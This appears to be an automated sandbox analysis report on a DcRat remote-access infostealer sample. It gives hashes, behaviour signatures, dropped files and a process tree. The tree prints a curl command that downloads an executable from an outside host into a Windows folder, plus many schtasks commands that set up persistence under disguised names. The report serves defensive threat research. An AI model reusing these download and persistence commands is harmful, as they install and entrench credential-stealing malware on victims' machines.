Overview

overview

10

Static

static

3

Source.exe

windows7-x64

1

Source.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    93s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250129-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-02-2025 18:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Source.exe

  • Size

    1.2MB

  • MD5

    6179f45e49ae7257c1fb5859dc119f73

  • SHA1

    14b8a63e92e4d9254a3949f841631b96f5eaa590

  • SHA256

    7dc826deb7225c544091b7a33f6e9093617941d90fba7c5b5057ff97e231270f

  • SHA512

    6f492fa5a1c7ba28c269355f80e316db05186ffd9ed28c72b1ce911cb8f46a10049fcfd09008ee99996194f4d154eb46e8b7af98c31db98a4a3690397a46b519

  • SSDEEP

    24576:CoJOLUTJcMfM2kO9shrYgTnwxznA1sUo1sUa2hZU6EmC3Fp39zZF35:7BnLUDUZi6EZFbVb

Score
10/10
dcratdiscoveryinfostealerratspywarestealer

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Dcrat family
    dcrat
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file 1 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Source.exe
    "C:\Users\Admin\AppData\Local\Temp\Source.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1860
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
        PID:1268
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c cls
        2⤵
          PID:2604
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c curl --silent https://cdn1337.site/builded.txt --output C:\Windows\Speech\physmeme.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3208
          • C:\Windows\system32\curl.exe
            curl --silent https://cdn1337.site/builded.txt --output C:\Windows\Speech\physmeme.exe
            3⤵
            • Downloads MZ/PE file
            • Drops file in Windows directory
            PID:2444
        • C:\Windows\Speech\physmeme.exe
          "C:\Windows\Speech\physmeme.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:3584
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\ESD\jZRzGmZ0nmWlIW7eyKvICIC2GnKeW02cdUcmyP.vbe"
            3⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3184
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\ESD\EOO029hu24.bat" "
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1244
              • C:\ESD\Winver.exe
                "C:\ESD/Winver.exe"
                5⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4640
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Mxmxtnevog.bat"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2492
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    7⤵
                      PID:1772
                    • C:\Windows\system32\w32tm.exe
                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      7⤵
                        PID:4760
                      • C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\conhost.exe
                        "C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\conhost.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2596
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\System.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1516
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2996
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1844
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Program Files\Reference Assemblies\Microsoft\StartMenuExperienceHost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2072
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:5056
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Program Files\Reference Assemblies\Microsoft\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3488
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\conhost.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3320
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\conhost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1132
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\conhost.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1832
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Application Data\taskhostw.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4856
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\All Users\Application Data\taskhostw.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3804
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Application Data\taskhostw.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:3176
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Users\Default User\Registry.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1440
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Users\Default User\Registry.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2980
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Registry.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:2748
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "WinverW" /sc MINUTE /mo 8 /tr "'C:\ESD\Winver.exe'" /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4780
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "Winver" /sc ONLOGON /tr "'C:\ESD\Winver.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:4960
          • C:\Windows\system32\schtasks.exe
            schtasks.exe /create /tn "WinverW" /sc MINUTE /mo 9 /tr "'C:\ESD\Winver.exe'" /rl HIGHEST /f
            1⤵
            • Process spawned unexpected child process
            • Scheduled Task/Job: Scheduled Task
            PID:1504

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ESD\EOO029hu24.bat
            Filesize

            61B

            MD5

            33c54a5f80394595d7f9f5bf2374f68c

            SHA1

            e515abb832132011a48661843ca2cb85ac7b7296

            SHA256

            97ec10319ebe1f05ac4f58bf8619aad0e0af8bcb0f11e8f44a73cd80fc125d2d

            SHA512

            8203808771aac07a702e986204fef3a3c5eb869f4863423b86b8fbb449f5a17700c459e96ec06958bdc17c48825380592aed90a93444e6d30027f3c1002e67bc

            Download Submit

          • C:\ESD\Winver.exe
            Filesize

            1.8MB

            MD5

            b5c4fa68d74ab47092a46241d6b10a16

            SHA1

            e754f10c51933c1ef98782fbf695e8f21198fe7e

            SHA256

            20e9dafaa42a6b6122ecc150622cf8aabe7a324527df144561de5ba0b486ab2a

            SHA512

            3ab67cb936cab9eb89bb8275309cbc5f56d7f03e554b5cc7bd54305c282b6e8a0feb4af8c1ebc7073d63c371444751c522b030748b4d57c28a768fd6cfdb5293

            Download Submit

          • C:\ESD\jZRzGmZ0nmWlIW7eyKvICIC2GnKeW02cdUcmyP.vbe
            Filesize

            202B

            MD5

            4652fb55e060252dacdca19aee6266b0

            SHA1

            7711f923873149629b869217eea3b9e7b53a37d2

            SHA256

            071d6610f34bb0b1e2f6077550a40faf08475865b2863f3340f44f82fc009c74

            SHA512

            2f73b677f27eb83ec54ecf6c75701e01ae69c8173ea6e081aed443ec19e6f8326de0a4dcb3c808c321f74f1c1916e5a2ecaffed0774fe29ba3889e593bb1515c

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\Mxmxtnevog.bat
            Filesize

            276B

            MD5

            d878bf277ca81677c1f7e8945f20e68f

            SHA1

            0d75c29e2137d44eeba29995d9d72e955736fb42

            SHA256

            a543e94bf838b7f7a0033abe958780fcb8140c61041d4a9c6f5b1fcfcebe62fe

            SHA512

            c3d1f0a569c9cb4dbba1b76f22b2a51ac056fa3f0acbc386f366e8d083b9547f897df07cc57712e3b516644122f27a0910bf8df909084f0938e212c9bc266baf

            Download Submit

          • C:\Windows\Speech\physmeme.exe
            Filesize

            2.1MB

            MD5

            1d6941fbe47aa24e563eaad080f6d13a

            SHA1

            438d9a13439a4bd5939f0dc7d5a8a252e802236a

            SHA256

            ca3ef84162bcbf7d8ba6fbe39ab1b64ac743291c967005ac739f8e6baee91e32

            SHA512

            c3949ebd681c06ea0b62790d517ace9ae1531acb5bf9d05a766ac575599a17bdaeda889f599092b61fb34312bcbd5d8cda0193f89a2627af2019b27302b70f7e

            Download Submit

          • memory/4640-15-0x00000000001D0000-0x00000000003A2000-memory.dmp

            Filesize

            1.8MB

            Download

          • memory/4640-18-0x000000001AE90000-0x000000001AE9E000-memory.dmp

            Filesize

            56KB

            Download

          • memory/4640-20-0x000000001AEC0000-0x000000001AEDC000-memory.dmp

            Filesize

            112KB

            Download

          • memory/4640-21-0x000000001AF40000-0x000000001AF90000-memory.dmp

            Filesize

            320KB

            Download

          • memory/4640-23-0x000000001AEE0000-0x000000001AEF8000-memory.dmp

            Filesize

            96KB

            Download